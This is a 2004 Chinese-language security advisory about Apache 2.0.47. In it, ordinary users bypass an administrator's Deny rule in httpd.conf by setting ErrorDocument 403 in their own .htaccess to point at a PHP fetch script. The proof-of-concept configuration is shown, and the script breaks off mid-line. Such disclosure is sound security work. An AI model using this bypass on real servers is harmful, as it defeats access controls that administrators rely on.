Apache Web Server 2.0.47访问控制限制可被普通用户绕过 (Linux,
发布日期: 2004-2-3
Apache Web Server 2.0.47访问控制限制可被普通用户绕过 (Linux,缺陷)
涉及程序:
Apache 2.0.47
描述:
Apache Web Server 2.0.47访问控制限制可被普通用户绕过
详细:
Apache Web Server允许管理员通过主配置文件httpd.conf,和普通用户在拥有的web分支配置文件 .htaccess进行管理。
作为Apache Web Server管理员可通过配置主文件httpd.conf覆盖普通用户在配置文件 .htaccess中所作的任何配置。
按理论,假如服务器管理员通过配置文件httpd.conf中Deny指令来限制其他用户对程序的访问,则其他用户应该不能在.htaccess文件中通过设置AllowOverride值绕过Deny指令进行某些未授权访问。但是我们测试发现,普通用户可通过在.htaccess文件中使用ErrorDocument指令绕过Deny指令的限制进行非法访问。
已测试平台:
Apache 2.0.47/RH-Linux/WinXP
安全方法:
EXAMPLE
##########################################################
# In the main httpd.conf file:
#
<Directory />
AllowOverride FileInfo
Deny From All
</Directory>
##########################################################
##########################################################
# In the user's .htaccess file placed in a child directory:
ErrorDocument 403 /child/dir/fetch.php
##########################################################
/********************************************************/
<?php
// In the fetch.php placed in the same directory:
$url = parse_url(
> >